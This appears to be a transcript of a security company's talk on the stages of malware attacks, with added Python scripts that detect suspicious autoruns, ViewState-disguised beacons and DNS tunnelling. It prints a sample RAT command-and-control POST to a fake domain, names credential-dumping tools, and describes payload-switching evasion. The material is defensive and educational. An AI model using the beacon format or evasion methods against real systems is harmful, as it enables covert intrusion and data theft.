ECrime presentation - A few bits about malware


Transcript of ECrime presentation - A few bits about malware

Page 1

A few bits about Malware
A story about trojan horses and rats.

Page 2

$ whoami

• Michael Hendrickx
• Senior Security Analyst @ HelpAG
• Vulnerability Assessments
• Social Engineering
• Presentations
• Created new undetected* RAT for the company
• Belgian

* Until now

Page 3

Malware attacks: a real threat

• Malware has caused a lot of damage
• Many names: RATs, viruses, Trojans, rootkits, ransomware, …
• Examples: Cryptolocker, Zeus, BlackEnergy, …
• Targets different platforms:
  • Browsers
  • Smartphones
  • PCs

Page 4

Malware attacks: stages

• Malware attacks come in 2 stages

Infection
  Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …

Persistence
  AV evasion, persistence, looting, CNC connectivity, lateral movement
  “you’re in trouble”

Page 5

Malware attacks: infection

• Stage 1: modes of infection
  • Exploited software bugs
  • (Spear) phishing
  • Waterhole attack
  • Malicious USB

Page 6

Malware attacks: infection

• Exploited software bugs
  • Attacker hacks into a vulnerable service
  • Could be anything:
    • SQL injection on a website leads to code execution
    • Poorly implemented upload functionality
    • Unpatched server software
    • Man in the Middle
    • Weak passwords
    • …

Page 7

Malware attacks: infection

• Spear phishing
  • Very specific message to a single or very few victims
  • Holds a malicious payload: macro, PDF, renamed files, trojaned archives, …
  • Or a link to a malicious file: it has to be downloaded by the victim, so it won’t get caught by your AV.

Page 8

Malware attacks: infection

• Waterhole attack
  • Indirect targeted attack
  • Attacker compromises sites that the victim probably visits.
  • Exploits outdated browser or plugins
  • Forces install of malware: “your flash player is outdated”, “you should update Java”

Page 9

Malware attacks: infection

• Evil USB dongle
  • A USB peripheral can be anything:
    • USB hard drive / dongle
    • Keyboard, WIFI / network adapter, microphone, …
    • Hub with any of the above
  • Example: USB Rubber Ducky
    • Looks like a dongle, is a keyboard
    • Types 1000 words per minute
    • Is only 30 USD

Page 10

Malware attacks: stages

• On to stage 2:

Infection
  Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …

Persistence
  AV evasion, persistence, looting, CNC connectivity, lateral movement

Page 11

Malware attacks: persistence

• Stage 2: Persistence
  • Execution persistence: ensure that our malware keeps on running
  • CnC connectivity: listen for commands
  • AV evasion / hiding: prevent the malware from being detected and removed
  • Lateral movement: infect more machines

Page 12

Malware attacks: Execution persistence

• Ensure malware keeps on running
  • Startup folder
  • Registry keys
  • Automatic services
  • Browser plugins / helper objects: you’re re-infected whenever the browser is opened
  • Infected document templates: every time a Word/PowerPoint/Excel file is opened or created, you’re re-infected.

Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
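Autoruns lists every location above, but on a real host the list runs to hundreds of entries, so the practical question is how to triage the export. The script below is an added example, not part of the presentation or of Sysinternals: it reads a CSV export (assumed to be the output of `autorunsc.exe -a * -c`, with column names "Entry Location", "Entry", "Signer" and "Image Path" as an assumption) and keeps only entries that combine two independent weak signals, because a single signal such as "runs from AppData" also matches legitimate software. The rows in SAMPLE_CSV are constructed for the example.

```python
"""Triage an Autoruns CSV export for suspicious persistence entries.

Added example, not part of the presentation or Sysinternals. It assumes a CSV
produced by `autorunsc.exe -a * -c` whose header contains "Entry Location",
"Entry", "Signer" and "Image Path" (column names are an assumption); the rows
in SAMPLE_CSV are constructed, not taken from a real host.
"""
import csv
import io
import re

# Constructed sample export. Rows 1-2 are ordinary signed entries; rows 3-5
# sit in the locations the slide names (Run key, Startup folder, browser
# helper object) and look the way a dropped RAT usually does.
SAMPLE_CSV = r"""Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OneDrive,enabled,Logon,EXAMPLE\user,Microsoft OneDrive,(Verified) Microsoft Corporation,Microsoft Corporation,c:\users\user\appdata\local\microsoft\onedrive\onedrive.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,svchost,enabled,Logon,EXAMPLE\user,,(Not verified),,c:\users\user\appdata\roaming\svchost.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,update.vbs,enabled,Logon,EXAMPLE\user,,,,c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\update.vbs
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects,{00000000-0000-0000-0000-000000000001},enabled,Explorer,System-wide,Helper,(Not verified),,c:\programdata\helper\bho.dll
"""

# Directories an unprivileged user can write to. A legitimate autorun there is
# not impossible (OneDrive above), which is why a second signal is required.
USER_WRITABLE = re.compile(r"\\(appdata|programdata|temp|users\\public|downloads)\\", re.IGNORECASE)
# Script interpreters are a common way to hide a loader in the Startup folder.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|ps1|bat|cmd|hta)$", re.IGNORECASE)


def reasons_for(row: dict) -> list:
    """Return the independent signals that make one autorun entry suspicious."""
    path = row.get("Image Path") or ""
    signer = row.get("Signer") or ""
    reasons = []
    # Autoruns prefixes a verified Authenticode signer with "(Verified)".
    if not signer.startswith("(Verified)"):
        reasons.append("image is unsigned or its signature is not verified")
    if USER_WRITABLE.search(path):
        reasons.append("image lives in a user-writable directory")
    if SCRIPT_EXT.search(path):
        reasons.append("autorun executes a script rather than a binary")
    return reasons


def triage(csv_text: str, min_signals: int = 2) -> list:
    """Parse the export and keep entries with at least `min_signals` reasons."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = reasons_for(row)
        if len(reasons) >= min_signals:
            findings.append({
                "location": row["Entry Location"],
                "entry": row["Entry"],
                "image": row["Image Path"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CSV):
        print(f"{f['entry']}  ({f['location']})\n  {f['image']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

Against the constructed export the two signed entries drop out and the three dropped-looking ones remain; on a real host, run the export on a known-clean build of the same image first and diff, which removes most of the remaining noise.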

Page 13

Malware attacks: CnC connectivity

• Direct traffic
  • Probably (hopefully) detected and blocked
• HTTP tunnel
  • May get detected by L7 firewalls
  • “deep packet inspection”, pretty shallow
• HTTPS
  • Difficult to see what’s happening, unless MITM.
• DNS tunneling
  • Usually gets “proxied” to the target DNS server
  • Do you monitor anomalies?
• Peer-to-peer WIFI network
  • “Hi, I’m an ad-hoc wifi network”
  • Range up to 10 – 20 meters

Page 14

Malware attacks: hagrat CnC

• Encode / Encrypt / Obfuscate traffic

POST /css/cc.aspx HTTP/1.1
Accept: text/html;q=0.8,application/xml,*/*
Accept-Language: en-gb;q=0.8,en
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.thisisafakedomain.com
Content-Length: 277
Connection: Keep-Alive

__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg==

The base64 in __VIEWSTATE decodes to:

1:Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\hendrickx\ownCloud>dir c:/
Invalid switch - "".

C:\Users\hendrickx\ownCloud>
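What makes this beacon catchable despite looking like an ordinary ASP.NET form post is that the field is a real ViewState only in name. The script below is an added example, not the presenter's RAT or tooling: it re-assembles the request from the slide into one raw HTTP message (host, cookie and blob are the slide's own fake values), pulls out __VIEWSTATE, base64-decodes it with the stripped padding restored, and applies two checks a network sensor can run: a genuine ASP.NET __VIEWSTATE is a serialised, normally MAC-protected object graph whose base64 begins with "/wE" (bytes 0xFF 0x01) and is mostly non-printable, whereas command output decodes to readable text containing a cmd.exe prompt. The short "/wE…" value used as a counter-example is constructed.

```python
"""Decode the beacon shown on the slide and decide whether it is a real ViewState.

Added example, not the presenter's RAT or tooling. CAPTURED_POST is the request
from the slide re-assembled into one raw HTTP message; the "/wE" prefix test
relies on real ASP.NET __VIEWSTATE being a serialised object graph whose
base64 starts with "/wE" (bytes 0xFF 0x01).
"""
import base64
import re
import string
from urllib.parse import unquote

CAPTURED_POST = (
    "POST /css/cc.aspx HTTP/1.1\r\n"
    "Accept: text/html;q=0.8,application/xml,*/*\r\n"
    "Accept-Language: en-gb;q=0.8,en\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
    "Host: www.thisisafakedomain.com\r\n"
    "Content-Length: 277\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "__VIEWSTATE="
    "MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBN"
    "aWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5k"
    "cmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVu"
    "ZHJpY2t4XG93bkNsb3VkPg"
)

# A Windows command prompt such as C:\Users\x> inside the decoded text.
PROMPT = re.compile(r"[A-Za-z]:\\[^\r\n]*>")
PRINTABLE = set(string.printable.encode("ascii"))


def b64_decode_lenient(value: str) -> bytes:
    """Decode base64 whose '=' padding was stripped, as in the captured beacon."""
    value = value.strip().rstrip("=")
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value, validate=True)


def printable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def analyse_viewstate(value: str) -> dict:
    decoded = b64_decode_lenient(value)
    text = decoded.decode("latin-1")          # lossless 1:1 byte-to-char view
    looks_like_aspnet = value.startswith("/wE")
    ratio = printable_ratio(decoded)
    has_prompt = PROMPT.search(text) is not None
    return {
        "decoded": text,
        "looks_like_aspnet": looks_like_aspnet,
        "printable_ratio": ratio,
        "has_shell_prompt": has_prompt,
        # Readable text with a shell prompt, in a field that should be opaque.
        "suspicious": (not looks_like_aspnet) and ratio > 0.9 and has_prompt,
    }


def parse_form_body(body: str) -> dict:
    """application/x-www-form-urlencoded -> dict. unquote() leaves '+' alone,
    which keeps the raw base64 '+' in the slide's blob intact (parse_qs would
    turn it into a space and break the decode)."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            fields[unquote(key)] = unquote(val)
    return fields


def analyse_request(raw: str) -> dict:
    head, _, body = raw.partition("\r\n\r\n")
    result = analyse_viewstate(parse_form_body(body).get("__VIEWSTATE", ""))
    result["request_line"] = head.split("\r\n", 1)[0]
    return result


if __name__ == "__main__":
    r = analyse_request(CAPTURED_POST)
    print(r["request_line"], "suspicious =", r["suspicious"])
    print(r["decoded"])
```

The decoded text is exactly the cmd.exe banner and prompt shown on the slide (196 bytes, the "1:" prefix included), and the beacon is flagged while a real "/wE…" ViewState is not. The same two checks apply to any form field or cookie a RAT repurposes as a channel; what they do not help with is the HTTPS case on the previous slide, where the sensor never sees the body without interception.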

Page 15

Malware attacks: hiding

• Hiding
  • Download multiple stages

Diagram: Dropper → infect victim → “Can I reach the Internet?” → download Malicious Payload (real virus) → “Does payload get detected?”

Page 16

Malware attacks: hiding

• Multi-stage download ensures correct victim

Diagram: Dropper → infect victim → “Can I reach the Internet?” → the download server checks who is asking:
  • “This is not the IP / company / country I’m targeting” → Innocent Payload → victim: “Cool, I’ll install it”
  • Otherwise → Malicious Payload (real virus) → “Bingo!”

Page 17

Malware attacks: lateral movement

• Exfiltration of information
  • Documents (%userprofile%\documents)
  • Passwords (mimikatz, LaZagne)
  • Browser history
  • Emails, files, …
• Recon / infect the network
  • Ping other machines
  • File shares
  • (SharePoint) portals

Page 18

Remediation

• Human factor: don’t get infected
  • Social engineering exercises
  • Awareness
  • Alerting IT security (“Support, I think I did something wrong”)
• Technical factor: prevent, detect, destroy
  • Tight controls on endpoints
  • Monitor inbound programs (attachments, downloads, …)
  • Monitor network usage: DNS anomalies, unidentified protocols, …
  • Regular scanning with AV, IOC detectors, … such as Loki (https://github.com/Neo23x0/Loki)
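Both the CnC slide (“DNS tunneling: do you monitor anomalies?”) and the remediation list above point at the same control: watching resolver logs for query patterns no browser produces. The script below is an added example, not from the presentation. It reads query-log lines in an assumed "<epoch> <client-ip> <qname> <qtype>" format (SAMPLE_LOG is constructed) and flags a registered domain when it receives many distinct subdomains whose leftmost label is long and high-entropy, the shape a tunnel has when it packs data into names. The registered domain is approximated as the last two labels, which is wrong for co.uk-style suffixes; a public-suffix list fixes that in production.

```python
"""Flag DNS tunnelling candidates in a resolver query log.

Added example, not from the presentation. SAMPLE_LOG is constructed in an
assumed "<epoch> <client-ip> <qname> <qtype>" format, one query per line;
the registered domain is approximated as the last two labels (assumption).
"""
import math
from collections import Counter, defaultdict

# Constructed log: ordinary browsing, one CDN-style hashed hostname (a single
# long label is not enough on its own), and a burst of encoded names under
# one domain carrying data out in TXT queries.
SAMPLE_LOG = """\
1700000001 10.0.0.5 www.example.com A
1700000002 10.0.0.5 mail.example.com A
1700000003 10.0.0.7 www.example.com AAAA
1700000004 10.0.0.7 d1a2b3c4d5e6.cdn-example.net A
1700000005 10.0.0.9 3fa9c1e2b7d4a05e6c8f1b2d.t.exfil-example.org TXT
1700000006 10.0.0.9 9b0e7d2c4a6f1e3d5c7b8a90.t.exfil-example.org TXT
1700000007 10.0.0.9 c4d1a8e6f2b9073e5d1a6c8b.t.exfil-example.org TXT
1700000008 10.0.0.9 7e2b9d4f0a1c6e8b3d5f2a97.t.exfil-example.org TXT
1700000009 10.0.0.9 0a5c8e1f3b7d2e9c4a6f1b8d.t.exfil-example.org TXT
1700000010 10.0.0.9 e8f1c3a7d5b0924f6e1a3c7b.t.exfil-example.org TXT
"""

# Record types that carry arbitrary payload back to the client.
PAYLOAD_QTYPES = {"TXT", "NULL", "CNAME"}


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data sits near log2(alphabet size)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line: str) -> dict:
    ts, client, qname, qtype = line.split()
    return {"ts": int(ts), "client": client, "qname": qname, "qtype": qtype.upper()}


def find_tunnel_candidates(log_text: str, min_unique: int = 5,
                           min_label_len: float = 16.0,
                           min_entropy: float = 3.0) -> dict:
    """Return {registered_domain: stats} for domains that look like tunnels."""
    per_domain = defaultdict(lambda: {"subs": set(), "lens": [], "ents": [],
                                      "payload": 0, "total": 0, "clients": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        labels = rec["qname"].rstrip(".").lower().split(".")
        d = per_domain[registered_domain(rec["qname"])]
        d["total"] += 1
        d["clients"].add(rec["client"])
        if rec["qtype"] in PAYLOAD_QTYPES:
            d["payload"] += 1
        sub = ".".join(labels[:-2])
        if sub:
            d["subs"].add(sub)
            d["lens"].append(len(labels[0]))           # leftmost label is where data goes
            d["ents"].append(shannon_entropy(labels[0]))

    findings = {}
    for dom, d in per_domain.items():
        # A handful of distinct names is normal; a stream of never-repeating
        # names is the signature, so this gate comes first.
        if len(d["subs"]) < min_unique:
            continue
        mean_len = sum(d["lens"]) / len(d["lens"])
        mean_ent = sum(d["ents"]) / len(d["ents"])
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            findings[dom] = {
                "unique_subdomains": len(d["subs"]),
                "mean_label_len": mean_len,
                "mean_entropy": mean_ent,
                "payload_qtype_share": d["payload"] / d["total"],
                "clients": sorted(d["clients"]),
            }
    return findings


if __name__ == "__main__":
    for dom, stats in find_tunnel_candidates(SAMPLE_LOG).items():
        print(dom, stats)
```

The thresholds are starting points, not constants: tune them on a week of your own logs, and expect to whitelist a few legitimate services (anti-virus cloud lookups and some CDNs also generate long hashed labels) before the output is quiet enough to act on.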

Page 19

Thank you!

Questions?

Don’t accept any USB dongles from me!

Page 20

CONTACT US | WWW.HELPAG.COM | [email protected]

DUBAI, UAE
ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741
T +971 4 440 5666
F +971 4 363 6742

ABU DHABI, UAE
SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195
T +971 2 644 3398
F +971 2 639 1155

DOHA, QATAR
AL DAFNA – PALM TOWER, OFFICE 4803, WEST BAY, P.O. BOX 31316
T +974 4432 8067
F +974 4432 8069